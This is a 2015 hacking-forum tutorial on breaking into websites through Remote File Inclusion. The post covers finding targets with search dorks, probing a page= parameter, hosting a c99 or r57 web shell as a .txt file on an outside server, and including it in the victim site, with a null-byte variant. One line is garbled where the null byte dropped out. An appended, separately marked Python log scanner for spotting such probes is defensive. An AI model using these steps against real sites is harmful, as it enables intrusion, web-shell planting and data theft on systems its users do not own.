NΙΜΒUZZ |FLOOD |SERVER BOTS|FREE VPS |BOMBZZ|TIPS|TRICS|FB AUTOLIKER |WEBHOSTING|HTML5|JAVA SCRIPT|JAVA PROGRAMING|PC|ANDROID|SYMBIAN|JAVA|VB.NET|C#.NET|PYHTON|FORUM BY VAXINO@NIMBUZZ.COM
 
 Hacking Website using RFI Method

vaxino
σωηεя
Posts : 14
Join date : 2015-09-15

PostSubject: Hacking Website using RFI Method   Wed Sep 16, 2015 7:51 pm

What Is RFI(Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:


* Code execution on the web server
* Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
* Denial of Service (DoS)
* Data Theft/Manipulation

RFI is a very uncommon vulnerability due to excessive patches and updates on websites.

So here we go, follow me!

Finding a Vulnerable Site using Google Dorks and Checking for vulnerability
Here I provided a link for finding vulnerable sites using Google Dorks for RFI



Now, to test whether our site is vulnerable to RFI or not, we will use the following command:

http://www.targetsite.com/index.php?page=www.google.com

Suppose our target site is http://www.aabbcc.com. For checking, our URL will become something like this:

http://www.aabbcc.com/v2/index.php?page=http://www.google.com

If the Google homepage shows up after executing the command, then the website is vulnerable to this attack. If it does not come up, then the site is not vulnerable to RFI.

Exploiting The Vulnerability
For that you will need to upload your shell

You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.

You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.

[You must be registered and logged in to see this link.]


Now comes adding our shell to the victim's website

Okay, once we are at the vulnerable page ([You must be registered and logged in to see this link.]) we will have to replace "http://www.google.com" and include our own file (in my place it's http://www.oursite.com/shell.txt).

Our new link should look like this.

http://www.aabbcc.com/v2/index.php?page=[You must be registered and logged in to see this link.]

NOTE: The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".

OK, so we uploaded our shell successfully to the target site, and I think you all know what you can do after uploading a shell to the site.
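
From the defender's side, the request shape described in the post (a `page=` parameter whose value is an absolute URL, sometimes with a trailing null byte) is easy to spot in web server access logs. The following is an added example, not part of the original post; the log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside an access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute or scheme-relative URL
REMOTE_RE = re.compile(r'^\s*(?:(?:https?|ftps?)://|//)', re.I)

def rfi_indicators(request_target):
    """Return (param, reason) pairs for query parameters that look like RFI probes."""
    hits = []
    query = urlsplit(request_target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = unquote(raw)  # parse_qsl decoded once; decode again for double encoding
        if REMOTE_RE.match(value):
            hits.append((name, "remote-url"))
        if "\x00" in value:
            hits.append((name, "null-byte"))
    return hits

def scan(log_lines):
    """Return (client_ip, request_target, hits) for each suspicious log line."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = rfi_indicators(m.group(1))
        if hits:
            findings.append((line.split()[0], m.group(1), hits))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder hosts)
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Sep/2015:19:51:02 +0000] "GET /v2/index.php?page=contact HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Sep/2015:19:52:11 +0000] "GET /v2/index.php?page=http://www.google.com HTTP/1.1" 200 912',
    '198.51.100.7 - - [16/Sep/2015:19:52:40 +0000] "GET /v2/index.php?page=http%253A%252F%252Fhost.example%252Fa.txt%3F HTTP/1.1" 200 877',
    '203.0.113.5 - - [16/Sep/2015:19:53:05 +0000] "GET /v2/index.php?page=about%00 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target, hits)
```

Parameters that legitimately carry URLs, such as redirect targets, will also match, so in practice the check is scoped to endpoints that pass the parameter to a file include.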